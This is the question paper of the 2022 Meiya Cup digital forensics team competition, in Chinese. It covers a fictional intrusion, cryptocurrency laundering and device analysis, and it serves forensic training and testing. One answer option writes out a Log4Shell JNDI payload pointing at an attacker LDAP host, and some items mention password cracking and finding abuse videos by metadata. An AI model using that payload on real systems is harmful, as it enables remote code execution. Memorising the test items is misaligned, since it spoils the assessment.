2022美亚杯电子数据取证竞赛团体赛

案情简介
2022 年 10 月，警方收到“AGC 集团”报案，表示该公司网络的电邮系统有可疑连接及流量。经过调查后，警方相信事件与本地一个 IP 地址有关，于是拘捕了一名男子朗尼（Rooney），并在他的家中搜到一些电脑，网络设备和手机。2022 年 10 月下旬，两名巡警在街上截查一名男子，名叫王景浩（阿浩 KingHo），在他的背包中找到了一些从网上下载的制作油漆弹教学材料，阿浩曾作出反抗但最后被制服。经调查后，警员发现阿浩计划于某日向某人投掷油漆弹，警员随后将他拘捕并于他家中扣押了一批电脑、手机。深入调查后发现阿浩亦与“AGC 集团”网络被入侵事件有关。警方的电子数据取证小组在现场作出初步了调查，并对涉案装置进行了电子数据取证。请你根据警方的资料，协助将事件经过还原。

您的姓名：



学号：

AGC-CS计算机里的 'Acrobat DC' 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59，需回答 20221229160159)

A:2022-09-28 19:01:40

B:2022-09-28 07:18:33

C:2022-08-30 19:01:40

D:2022-08-30 07:18:33

AGC-CS计算机里的用户 'Carson' 链接了一个网络磁盘机 (Network Drive)，在下列哪一个档案有相关资料?

A:\Users\Carson\NTUSER.DAT;

B:\Users\admin\NTUSER.DAT;

C:\Windows\System32\config\SYSTEM;

D:\Windows\System32\config\SOFTWARE;

E:\Windows\System32\config\SECURITY

承上题，用户 'Carson' 连接的网络磁盘机的IP地址是什么?

分析计算机里的电邮数据，当中包含嫌疑人王景浩可能的居住地址，请回答他住址的楼层

以阿拉伯数字回答

承上题，王景浩使用的信用卡号码最后四位数字是?

AGC-CS计算机用户 'Carson' 曾经收到一个电邮并通过里面的链结下载了一个可疑的 'Word' 文件，那个的档案的档案名是什么?

不要输入 '.'，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG

承上题，分析该 'Word'文件，它的可能用途是?

AGC-CS计算机里有一个名为 'admin' 的用户，它是在何时被建立的? (以时区UTC+8回答)

10.

黑客第一次采用用户 'admin' 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是?

以时区UTC+8回答,如答案为 2022-12-29 16:01:59，需回答 20221229160159

11.

黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件，这软件的真正名称是?

以大写英文及阿拉伯数字回答

12.

AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 'admin' 曾经采用记事本 (Notepad) 打开了一个文字档案，这个文字档的SHA-256哈希值是什么?

以大写英文及阿拉伯数字回答

13.

承上题，黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 ('Media Access Control' Address - MAC Address) 并存到一个名为 'ip.txt' 的档案。当中 '192.168.182.130' 计算机的MAC地址是什么?

不要输入 '：' 或 '-' ，以大写英文及阿拉伯数字回答

14.

黑客除了通过 'RDP' 外，还采用什么软件远端控制 (Remote Control) AGC-CS计算机?

15.

AGC_Server里LVM (Logical Volume Management 逻辑卷轴管理) 的 VG (Volume Group 卷组) 'pve' 共有多少PE (Physical Extent 物理块) ?

以阿拉伯数字回答

17.

检视 'Proxmox' 里的 'VM' (Virtual Machine 虚拟机), 编号 '111' 的主机名 (hostname) 是什么?

不要输入符号，以大写英文及阿拉伯数字回答

18.

分析 'VM' (虚拟机) 编号 '111' 的网页服务器日志，当中记录了黑客曾向该服务器发出多少次远程代码执行的网络攻击？

以阿拉伯数字回答

19.

哪一个IP地址尝试登录'VM' (虚拟机) 编号 '111' 失败次数最多?

20.

黑客在入侵 'VM' 编号 '111' 后，打算涂改AGC公司的网页，黑客在传送相关档案时所用的端口 (Port) 是什么?

以阿拉伯数字回答

21.

根据 'VM' 编号 '111' 里网页服务器 (Web Server) 的设定，访客可从下列哪个网页地址访问这个服务器?【多选题】

22.

黑客曾入侵 'VM' 编号 '111' 里的电邮系统 'Xeams'，他登录的时间是?

以unix时间戳回答，格式如:1665049779010

23.

黑客在入侵后盗用AGC员工电邮户口及冒充AGC员工回复了电邮给客户，发出这封电邮的操作系统 (Operating System) 及电邮软件 (Mail Agent) 是什么?

A:Mac OS X 10.15 rv:102.0, Thunderbird/102.3.0;

B:Mac OS X 10.15 rv:102.0, Thunderbird/91.13.1;

C:Mac OS X 10.15 rv:91.0, Thunderbird/91.13.1;

D:Mac OS X 10.11 rv:60.0, Thunderbird/60.9.1;

E:Windows 10 Pro, Outlook 2016

24.

黑客在 'Proxmox' 里留下了一个被加密的程序 (Program)，在解密后它的SHA-256哈希值 (Hash Value) 是什么?

25.

承上题，分析程序代码 (Program Code)，上述程序的档案名应是什么?

不要输入 '.'，以大写英文及阿拉伯数字回答。如 Cat10.jpg，需回答CAT10JPG

26.

于虚拟机 'VM' 编号 '111' 里的档案 '\srv\samba\share\AGC photo\DSC01139.JPG' ，照片中出现的街道名称是?

27.

王景浩的计算机使用什么文件系统 (File System) ?

A:exFAT;

B:APFS;

C:HFS;

D:HFS+

28.

王景浩计算机的操作系统 (Operating System) 版本是什么?

A:10.4.11;

B:10.9.5;

C:10.10.5;

D:10.11.6

29.

王景浩的计算机现有多少个用户 (包括访客 'Guest' )?

以阿拉伯数字回答

30.

王景浩的计算机里有一个用户被删除，被删除的用户名称是什么?

以大写英文回答

31.

王景浩的计算机有多少个聚焦的搜索记録 (Spotlight Search) ?

以阿拉伯数字回答

32.

当用户设置了自动登录 (Auto Login) 后，王景浩计算机的操作系统会产生哪个档案?

A:manifest.plist;

B:info.plist;

C:PasswordPanel.strings;

D:kcpassword

33.

王景浩计算机的登录密码 (Login Password) 是什么?

A:1qa@WS3ed;

B:3ed$RF5tg;

C:5tg^YH7uj;

D:2ws$RF6yh

34.

在王景浩的计算机里，他最后使用哪个电邮地址登录 'iCloud' 账号?

A:kinghoo0w0@gmail.com;

B:wonghoo588@yahoo.com;

C:kingho726@aol.com;

D:kinghoo0w0@yahoo.com

35.

王景浩计算机里的手机备份 (iTunes Backup) 包含哪些iOS版本?【多选题】

A:12.5.6;

B:15.4;

C:15.5;

D:16.0.3

36.

王景浩曾经将一台 iPhone 6 连接他的计算机，请问它最后的连接时间是什么?

以时区UTC+8回答,如答案为 2022-12-29 16:01:59，需回答 20221229160159

37.

苹果手机备份的密码 (iTunes Backup Encryption Password) 会记录在什么档案?

A:Info.plist;

B:privacy.json;

C:Manifest.plist;

D:PasswordPanel.strings

38.

以下哪种工具可以用作破解密码?【多选题】

A:Passware;

B:John The Ripper;

C:HashCat;

D:Password Recovery Toolkit

39.

通过 'hashcat' 破解 'iTunes Backup' 密码需要制订一个 'txt' 档案，若该备份的手机iOS版本是10以上，需要按照下列哪个提示字符 (String) 的数据去制订这个 'txt' 档案?【多选题】

40.

王景浩采用了4位数字加密了他的iPhone XR的备份，分析它的密码是什么?

以阿拉伯数字回答

41.

最后一次连上王景浩计算机的3D打印机的IP 地址是什么?

不要输入答案中的 '.'，以阿拉伯数字回答

42.

打印机最后一次在王景浩的计算机的尝试打印的时间?

以时区UTC+8回答,如答案为 2022-12-29 16:01，需回答 202212291601

43.

最后一次经由王景浩计算机打印的3D图档案名字是什么?

A:CE3_balljoint_extender.gcode;

B:um3-penguin-real-mini-keychain-merged-tpu.gcode;

C:CE3_Prancer.gcode;

D:CE3_2020-psu-atx-mount.gcode

44.

王景浩计算机的Safari浏览器的默认搜索引擎 (Default Search Engine) 是什么?

A:百度;

B:谷歌;

C:360;

D:Safari

45.

分析王景浩计算机的数据，王景浩的比特币钱包 (Bitcoin Wallet) 地址是什么?

A:bc1quw... ...zpzjzt;

B:bc1qm... ...5f7n9g;

C:bc1q79... ...h4sq52;

D:bc1qsl... ...je7hkk

46.

AGC员工 'Carson' 有一个由公司发给他的电邮账户，分析王景浩的计算机并找出 'Carson' 的电邮账户密码

A:AGC2020@pw;

B:AGC2012@PW;

C:AGC2020@hkg;

D:AGC2021@PW

47.

王景浩曾经冒充AGC公司员工 'Carson' 发送电邮给AGC 客户，这封电邮的 'Message-ID' 是什么? 回答它的首8位数值。

以大写英文和阿拉伯数字回答，如 4GEF90GD

48.

王景浩采用计算机里的哪种工具进入和偷取AGC公司的数据?【多选题】

A:Teamviewer;

B:OpenVPN;

C:Remote Desktop Manager;

D:Tor Browser

49.

王景浩在AGC公司盗取了以下什么类型的档案?【多选题】

A:ost;

B:xlsx;

C:jpg;

D:docx

50.

王景浩的计算机于2022年9月29日曾经接上一个虚拟专用网络 (Virtual Private Network - VPN)，这个VPN的IP地址是什么?

不要输入答案中的 '.'，以阿拉伯数字回答

51.

装置 '「KingHoo」的iPhone' 的蓝牙媒体访问控制地址 (MAC Address) 是什么?

不要输入答案中的 '：' 或 '-' ，以大写英文及阿拉伯数字回答

52.

王景浩何时将 '小宝' 加为iPhone XR的手机联络人 (Contact) ? (以时区UTC +8回答)

55.

王景浩的iPhone XR手机记录了他曾于2022年8月26日试飞无人机，当天试飞的地点在哪里?

56.

王景浩于2022年8月26日试飞无人机的总飞行时间 (Total Flight Time) 多久?

57.

王景浩用 iPhone XR 拍了一张照片'IMG_0012.HEIC'，那照片什么地方曾被修改?【多选题】

58.

承上题，那张照片修改后的经纬度是什么?

不要输入答案中的 '.'，将经纬度合并回答。如 22.2846135 114.1739116，需回答 2228461351141739116

60.

以下哪项对于朗尼草莓计算机操作系统的描述是正确的?【多选题】

61.

承上题，'VPN' 服务器的IP地址及端口 (Port) 是什么?【多选题】

62.

朗尼草莓计算机操作系统设定了一个档案来储存系统的 'log_file' ，档案名称是什么?

只需回答档案名，以大写英文回答

65.

根据装置的过往记录，'log_file' 是设在 'usr/rooney/' 的哪个已被删除的子文件夹里 (Sub Directory)?

答案中的英文字母以大写回答

66.

王景浩 SD 记忆卡 (SD Memory Card) 的储存容量有多少个字节 (Byte) ?

以阿拉伯数字回答

69.

记忆卡的档案不能被读取，记忆卡受损的原因包括?【多选题】

A:目录项结构 (Directory Entry) 受损;

B:启动扇区表 (Master Boot Record) 受损;

C:文件分配表 (File Allocation Table - FAT) 受损;

D:引导扇区 (Boot Sector) 受损;

E:以上各项皆是

70.

承上题，通过分析及手动恢复还原，记忆卡里有多少个受损的情况出现? (以阿拉伯数字回答)

71.

记忆卡第一个文件系统 (File System) 中有一个图片档案，它的SHA-256哈希值是F7E003781456D2E01CFE0EB46988D5BB433ADF9841164BBB90BAC67C0C9B21AF。该档案显示了哪些影像?【多选题】

72.

检视记忆卡的数据，在2022年10月9日约中午12时5分至12时15分之间的录像 (Video) 中，曾经出现哪一个IP地址?

73.

恢复还原后的记忆卡中，第二个文件系统显示有多少个空闲簇 (Free Cluster)?

以阿拉伯数字回答

74.

记忆卡第一个文件系统中有一个视频档，它的SHA-256哈希值是847E1E5FEF64B49C8D689DC3537D619B87666619A7C1EF0CC821153641847C19，这个视频档数据存在文件系统 (File System) 的最后的簇号 (Last Cluster Number) 是什么?

以阿拉伯数字回答

75.

经过手动恢复还原 (Date Recovery) 后记忆卡的SHA-256哈希值是什么?

76.

朗尼的计算机有什么软件可以创建比特币钱包 (Bitcoin Wallet)?

A:MetaMask;

B:Electrum;

C:Trezor;

D:以上皆非

77.

朗尼通过比特币替王景浩清洗黑钱，分析朗尼的计算机及手机，朗尼收取王景浩黑钱的比特币地址 (Bitcoin Address) 是什么?

以大写英文及阿拉伯数字回答

79.

朗尼的计算机里有一个没被加密的比特币钱包，它的回复种子 (Recovery Seed) 不包含哪一个英文字?

A:oppose;

B:area;

C:twice;

D:roast

81.

朗尼将加密了的比特币钱包的密码存在他计算机的一个档案里，这个档案的副档名是什么? (以大写英文及阿拉伯数字回答)

82.

朗尼在手机里有一个加密了的比特币钱包，他采用什么应用程序把该钱包里的黑钱转换成另一种加密货币?

A:Safepal;

B:Metamask;

C:Changelly;

D:Opensea

83.

承上题，这次转换加密货币的日期和时间是什么?

A:2022-10-07 10:29时;

B:2022-10-07 11:06时;

C:2022-10-07 11:07时;

D:2022-10-07 13:54时

84.

朗尼在计算机里采用什么浏览器 (Browser) 及在什么日期时间在他的计算机安装 'MetaMask' ?

A:Chrome, 2022-08-25 12:35时;

B:Chrome, 2022-10-07 14:29时;

C:Firefox, 2022-08-25 12:35时;

D:Firefox, 2022-10-07 14:29时

85.

朗尼在计算机里所创建的非同质化通证 (Non-Fungible Token - NFT) 使用哪一个种区块链 (Blockchain) 技术?

86.

朗尼在什么日期时间把计算机中创建的非同质化通证 (NFT) 放售?

A:2022-10-07 14:47时;

B:2022-10-07 14:49时;

C:2022-10-07 14:52时;

D:2022-10-07 14:54时

87.

朗尼的手机里，有什么应用程序与将黑钱 (比特币) 转换成另一加密货币的地址有关?【多选题】

A:Metamask;

B:Opensea;

C:Safepal;

D:YouTube

88.

朗尼的手机里，于2022-10-07，15:07时至15:08时做过什么动作?

A:登录 'Metamask';

B:登录 'Opensea';

C:屏幕截图 (Screen Capture);

D:登录 'YouTube'

89.

承上题，从这个动作中能找到什么资讯?【多选题】

90.

在朗尼的计算机旁找到 'MetaMask' 的密码是 'opensea741'，找出朗尼计算机里的 'MetaMask' 中有多少加密货币余额?

不要输入 '.'，以阿拉伯数字回答，如 0.137 需回答 0137

91.

朗尼的计算机曾用什么电邮地址登录电邮帐号?

不要输入答案中的 '@' 及 '.'，以大写英文及阿拉伯数字回答，如 name@mail.com，需回答 NAMEMAILCOM

92.

什么电邮账号曾接收过上述电邮地址的电邮?

不要输入答案中的 '@' 及 '.'，以大写英文及阿拉伯数字回答，如 name@mail.com，需回答 NAMEMAILCOM

94.

上述电邮附件里的文件，被遮蔽的英文单字是什么?

以大写英文回答

95.

跟据上述电邮附件里找到的回复种子 (Recovery Seed)，请计算出在 'MetaMask' 使用的Ethereum地址? (提示： BIP-44 derivation path = m/44'/60'/0'/0/0) (不要输入开头的0X，以大写英文及阿拉伯数字回答)

96.

在2022年9月28日18时51分 (UTC+8)，朗尼曾经在手机用WhatsApp与王景浩对话，语句 [有灯，风扇经常在转]，回复这句话的相关语句是什么?

A:你有推介吗?;

B:我之前放在你家的机械运作正常吗?;

C:有灯号，风扇有转动?;

D:帅吗?

97.

朗尼通过手机相约王景浩于10月15日到哪一个地区食晚饭?

A:荃湾;

B:湾仔;

C:九龙城;

D:九龙塘

98.

朗尼手机的 'WhatsApp' 号码是( )@s.whatsapp.net?

以阿拉伯数字回答

99.

朗尼的手机曾连接以下哪一个WIFI网络?【多选题】

A:taiiphone;

B:rooneyhome;

C:Function Room;

D:TP-Link

100.

朗尼的手机曾连接WIFI [SSID: faifai], 它的登录密码是什么 ?

A:abcd5678;

B:aaaa0000;

C:rooney111;

D:rdfu1234

101.

在朗尼手机于2022年9月30日的 'WhatsApp' 对话里，有一段音讯 (Voice Message) 提到王景浩会给朗尼现金多少作为租用 'VPN' 的租金?

以阿拉伯数字回答

102.

就AGC集团网络的流媒体服务器 (Media Server)，有多少个本地用户曾经成功登录过?

以阿拉伯数字回答

103.

就AGC集团网络的流媒体服务器，有多少个本地用户曾经成功用 'ssh' (Secure Shell)登录过?

以阿拉伯数字回答

104.

就上述的本地用户，成功通过 'ssh' 登录过该流媒体服务器多少次?

以阿拉伯数字回答

105.

试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 'ssh:notty' 登录该流媒体服务器?

106.

就该流媒体服务器的本地用户, 有一个用户名是 'S' 开头的, 试找找该用户的姓氏?

以大写英文回答

107.

该流媒体服务器是有使用Docker容器 (Docker Container) 的，当中包含以下哪个Docker镜像 (Docker Image) ?【多选题】

109.

该流媒体服务器是使用 'WordPress' 建站 (Create Website) 的，就 '比特币' 标题，有以下的电子邮箱地址曾经留有评论?【多选题】

110.

该流媒体服务器里其中一个本地用户是有使用 'calendar' 日历工具的, 日历内曾经提及以下哪个网站?

111.

该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用那一个RAID级别?

请选择最合适的答案

112.

该基本镜像存储池 (Basic Storage Pool) 里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份?

113.

承上题，拥有该段儿童色情影片的用户名称是什么?

不要输入符号，以大写英文及阿拉伯数字回答

114.

就AGC集团网络的流媒体服务器，曾经有用户搜索过有关于儿童色情影片的资料而得到搜索结果，该用户所输入的网址是什么?

不要输入符号，以大写英文及阿拉伯数字回答，如 https://web3.com，需回答 HTTPSWEB3COM

115.

该基本镜像存储池 (pool) 有一个快照 (Snapshot)，快照的名称是什么?

不要输入符号，以大写英文及阿拉伯数字回答，如 media/mediapool@abc123，需回答MEDIAMEDIAPOOLABC123

116.

就上述所找到的基本镜像存储池快照 (Snapshot)，它储存了多少个档案?

以阿拉伯数字回答

118.

承上题，'Data' 文件夹里有一个被加密了的档案，它是被哪一种加密方法加密?【多选题】

120.

尝试将档案解密，找出以下哪一个名字出现在被加密的档案里?【多选题】

121.

分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 'GET' 指令，它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么?

A:https://155.137.195.111:8080;

B:http://www.w3.org/2003/05/soap-envelope;

C:http://61.238.217.108:8000;

D:以上皆非

122.

IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 'POST' 指令，它在 'HTML Form' 项目的 'uname' 栏所输入的字符串是什么?

A:root;

B:${jndi:ldap://61.238.217.108:1389/a};

C:application/x-www-form-urlencoded;

D:password

123.

AGC服务器10.0.66.184收到IP地址61.238.217.108的 'POST' 指令后，它执行了哪些行动?

A:使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口;

B:于IP地址61.238.217.108下载了Exploit.class;

C:使用端口49264连接IP地址61.238.217.108发送同步要求;

D:以上皆是

124.

IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令?

以阿拉伯数字回答

125.

AGC服务器10.0.66.184里有一个AGC目录 (Directory)，它的子目录 (Sub Directory) 包含以下哪一个?【多选题】

126.

入侵者迸入AGC服务器10.0.66.184后，他成功执行以下哪些指令?【多选题】

127.

入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename)，这个档案的原来名称是什么？

A:cGhvdG9zT0Zyb2NreQ==;

B:Finanical.xls;

C:readme.txt;

D:anonymous

129.

承上题，该档案的SHA-256哈希值是什么?

130.

通过取证调查结果迸行分析 (包括但不限于以上问题及情节)，以下哪项关于王景浩的推断是正确的?【多选题】

A:曾经采用他的计算机入侵AGC集团网络;

B:发布儿童色情物品;

C:于AGC集团取得大量客户资料;

D:通过VPN取得Rooney家里的IP地址;

E:企图更改AGC集团的网页

问卷星提供技术支持